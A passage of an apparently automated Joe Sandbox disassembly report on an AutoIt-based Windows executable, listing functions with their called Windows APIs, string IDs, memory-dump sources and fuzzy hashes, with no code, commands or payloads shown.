                                                              • Part of subcall function 00007FF7EC13EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7EC13EF76
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC128209
                                                            • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC12828F
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC16D36A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: AutoIt
                                                            • API String ID: 1986988660-2515660138
                                                            • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction ID: cda7c817526f690a53eb9f3a47262f1e7bd29d3261e29d78000120190bc44e6c
                                                            • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction Fuzzy Hash: DBC1C579D18B4285E640EF14BC80279FBA8FF94390F91023BE46D4A765EF7CA141C7A2
                                                            Function 00007FF7EC1272C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_Stringwcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3135491444-1585850449
                                                            • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction ID: ff9bd7969379563dc0c7ef4b04f614772dee4570d87f7eceeef670121a7f5279
                                                            • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction Fuzzy Hash: D24172A9A08786D6E724FB20F8403FAA365FB45344FD44033D64C4669ADE7CD544D762
                                                            Function 00007FF7EC123F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32 ref: 00007FF7EC16BAA2
                                                              • Part of subcall function 00007FF7EC1256D4: GetFullPathNameW.KERNEL32(?,00007FF7EC1256C1,?,00007FF7EC127A0C,?,?,?,00007FF7EC12109E), ref: 00007FF7EC1256FF
                                                              • Part of subcall function 00007FF7EC123EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7EC123ED8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                            • API String ID: 779396738-2360590182
                                                            • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction ID: 5cb4760f3ea52551e89994827ec2220342bab4c993070281f23e08f3bb24521e
                                                            • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction Fuzzy Hash: 2B318DAA608B82C9E714EF21E8402ADB7A8FB49B84F984136DE8C47B55DF3CD545C721
                                                            Function 00007FF7EC144610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Killwcscpy
                                                            • String ID:
                                                            • API String ID: 3812282468-0
                                                            • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction ID: 834153750f5b4567050e9429bd08977bfcb83cd3be91b3011bfd5cda6aa52d1e
                                                            • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction Fuzzy Hash: 973184AAA0C7C287EB61AB11A1403B9BB59E745F84F984037DE4D0B749CE3CD545C762
                                                            Function 00007FF7EC126F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FA5
                                                            • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FD3
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction ID: 81c9f6b46565826ede54ecd0e3511c20c93dcf13276eabe2fedc37c74bb16384
                                                            • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction Fuzzy Hash: 13218BBBA18B41C7D7209F25F450A6EB3A4FB49B84B841132EB8D83B18DF39E414DB55
                                                            Function 00007FF7EC149118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction ID: a39b1eed1701def3ff9e3b18a1c0c4e7126f7895b8a36b6b17bb0836fb335cb5
                                                            • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction Fuzzy Hash: 7CE048A8B04305C3EF147B617C8577557566F49B52F845039C80E07396DD7DE409C222
                                                            Function 00007FF7EC1366C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                            • Instruction ID: 657374f51b407cacd3a46847ba65157207a9f7916897c65d1d6f25c2d5dafce1
                                                            • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                            • Instruction Fuzzy Hash: 88228CBAB086418AEB10EF68E4403ACB7B1FB44B88F914137DA4D5B795DF38E455C322
                                                            Function 00007FF7EC126838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction ID: 1d91a23e7935aade15547839aea08a62a559e94195499d8c3fcd2ab87011253e
                                                            • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction Fuzzy Hash: 1D416DBAA08742C6E764AF24F414339B6A0EB45BA8F844236DA6D076C9CF3DD414D752
                                                            Function 00007FF7EC126460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction ID: b6a0ffdff8ffbb9dea317b5fc86acc66168f7d7decd84cf4724b4535df50be26
                                                            • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction Fuzzy Hash: 054182AAB14A56CAEB14EF25E4513BC63A0EB447C8F844132EA4D476C9DF3CD454D721
                                                            Function 00007FF7EC126258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction ID: 473e39a2360c60e1bbca02d4d269d7cb452101c74a4600e8448bb26a6c7ceee3
                                                            • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction Fuzzy Hash: A6419FB9909B85C6EB55AF11F4403ADB3A8FB48B88F844036EA4C0B399CF7CD550C761
                                                            Function 00007FF7EC123730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00007FF7EC123756
                                                              • Part of subcall function 00007FF7EC149334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC149348
                                                              • Part of subcall function 00007FF7EC1236E8: SystemParametersInfoW.USER32 ref: 00007FF7EC123705
                                                              • Part of subcall function 00007FF7EC1236E8: SystemParametersInfoW.USER32 ref: 00007FF7EC123725
                                                              • Part of subcall function 00007FF7EC1237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC1237F2
                                                              • Part of subcall function 00007FF7EC1237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123807
                                                              • Part of subcall function 00007FF7EC1237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC12388D
                                                              • Part of subcall function 00007FF7EC1237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123924
                                                            • SystemParametersInfoW.USER32 ref: 00007FF7EC123797
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 4207566314-0
                                                            • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction ID: 2548610a2161f56a24290d3322b9fe3a9483502788fb17d612247786fef556e3
                                                            • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction Fuzzy Hash: 7501E8ACE0C2428AF714BB61B895775E669AF04700FC40037E45D8A3A6DE7DA485C722
                                                            Function 00007FF7EC15B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction ID: 759d8ebcd6dd3ea40b0a7f4ffdeae82a353f14476f12ae437bb2ac756580783b
                                                            • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction Fuzzy Hash: 67E086D8E19103C2FF047BF67805375A6915F44741BC44032CA0D46255DD3CE445C622
                                                            Function 00007FF7EC1604B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast
                                                            • String ID:
                                                            • API String ID: 918212764-0
                                                            • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction ID: e1e7e3c254126777aa7e66f71b72e7017759c0e62c9a98f1640f1fb17fce8137
                                                            • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction Fuzzy Hash: 3F11B199F0C242C1FEA4B768B594378A6915F947A4F84013BDA3E062D6CE7CA845C227
                                                            Function 00007FF7EC131475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                            • Instruction ID: fd0039d32c1bb7c0b7e66251fae90c0039cb2251c6063c32e22259437d7d9343
                                                            • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                            • Instruction Fuzzy Hash: DB32B5AAA0C682C5EB60EB19E4443B9E761FB45B88F954133EE4D07795DF3CE841C722
                                                            Function 00007FF7EC1820D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction ID: 5b6165e495df43dc5d01bdaebcb688b60689189e63cd2ccaaa8a51f9ff07a520
                                                            • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction Fuzzy Hash: 1541907AB08A4186FB11EF65E0403ACA7A1FB44B88F954536CE0D1B789CF7CE455C362
                                                            Function 00007FF7EC148FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                            • Instruction ID: 9726f12c2af8658d6494543eec0b84b68b4bfb513913d22276a8d1cf1c7b5813
                                                            • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                            • Instruction Fuzzy Hash: 5A41C3A9E0865282FB64BB14F451379E259BF40B45FC44437DA0E0B2D5EE7EE841C362
                                                            Function 00007FF7EC166D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
